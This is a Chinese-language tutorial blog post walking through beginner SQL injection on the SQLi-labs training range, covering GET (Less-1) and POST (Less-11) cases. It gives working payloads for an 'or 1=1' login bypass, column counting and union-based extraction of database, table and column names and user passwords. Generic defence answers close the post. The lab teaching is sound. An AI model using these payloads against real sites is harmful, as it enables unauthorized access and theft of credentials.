一篇文章教你玩转,入门级 SQL 注入实战!

 


SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或

过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了

SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战


一、实战准备

安全测试靶场:SQLi-labs

工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具

二、SQL注入思路

1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据

三、SQL注入实战-Get场景

进入SQLi-labs的Less-1关,输入id的值

1、id=1' ,发起请求,返回SQL语法错误

图片

2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞

图片

3、判断当前表的字段数

select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。

输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。

图片

输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!

图片

4、获取数据库库名

使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。

id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。

图片

5、获取数据库的表名

id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。

图片

6、获取表中的字段名

id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。

图片

7、获取表中需要的数据

id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;

可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。

图片

四、SQL注入实战-POST场景

进入SQLi-labs的Less-11关,输入Username、Password。

1、判断是否存在sql注入漏洞

在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。

图片

直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。

图片

2、判断当前查询表的字段数

通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:

图片

在burpsuite中分别修改数据,进行后续步骤的操作:

uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。

图片

图片

3、获取当前数据库名

uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。

图片

4、获取当前数据库下的表名

uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息

图片

5、获取表中字段名

uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password

图片

6、获取表中数据

uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。

图片

 

当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!

 

学无止境,行以致远!

  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: SQL注入是一种常见的攻击方式,攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取敏感信息或者执行非法操作。SQL注入攻击的原理是利用Web应用程序没有对用户输入的数据进行充分的过滤和验证,从而导致恶意SQL语句被执行。为了防止SQL注入攻击,开发人员需要对用户输入的数据进行严格的过滤和验证,同时使用参数化查询等技术来防止SQL注入攻击。 ### 回答2: SQL注入攻击是指攻击者通过把恶意的SQL语句插入到应用程序输入数据中的方法,来实现非法操作或篡改数据的一种攻击技术。攻击者利用SQL注入漏洞可以获取敏感数据,改变数据库中的数据,甚至完全控制应用程序。 攻击者利用SQL注入漏洞,可以通过几种方法来实现攻击。以下是一些常见的SQL注入攻击方式: 1.基于错误的注入:攻击者可以通过注入恶意SQL语句,导致应用程序出现错误或异常,从而获得应用程序内部的敏感数据。 2.盲注注入:攻击者可以通过注入语句,来获取数据库信息,如数据库版本,或者判断SQL查询的结果是否正确。 3.联合查询注入:攻击者可以通过在注入语句中添加SELECT语句,来获取敏感数据或执行一些非法操作。 SQL注入攻击作为一种常见的网络攻击方式,需要我们在开发过程中加强对应用程序输入数据进行过滤和检查,以防止SQL注入漏洞。以下是一些预防SQL注入攻击的方法: 1.使用参数化查询:应用程序可以使用参数化查询语句,通过绑定参数来保证输入数据不会被作为SQL语句的一部分执行。 2.限制用户输入:应用程序可以限制用户输入的字符集合,或对用户输入的内容进行验证和过滤。 3.对于敏感数据,可以使用加密等措施来保证数据的安全性。 总之,应用程序开发者需要认识到SQL注入攻击的威胁,并在开发过程中采取一些预防措施来保证应用程序的安全性。 ### 回答3: SQL注入是一种常见的网络攻击方式,旨在通过在输入框或者URL中注入SQL代码,以达到破坏或者获取数据库数据的目的。SQL注入可以通过输入合法的SQL语句来实现,或者通过输入特定的字符来执行恶意代码。 SQL注入攻击的原理在于,攻击者在输入框或者URL中输入包含SQL关键词的字符,这些字符会被解释成SQL命令执行,并且会以其余参数的身份执行,这意味着该攻击可以以管理员的身份执行,且能获取数据库的全部数据。 SQL注入攻击的表现可以是网站遭到入侵或者数据库中数据突然消失或者受到修改。为了防止SQL注入攻击,应该首先排除参数化输入的漏洞,即对于用户输入的数据需要进行过滤,过滤掉控制字符,即可有效地防止SQL注入攻击。 总之,SQL注入攻击是一种网络安全威胁,要防范此类攻击,网站管理者应当在网站上做好安全措施,确保用户输入的数据进行有效的过滤和检查以保证安全性。同时,网站用户也应避免输入不必要的信息和暴露个人隐私等信息,以避免成为攻击者的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值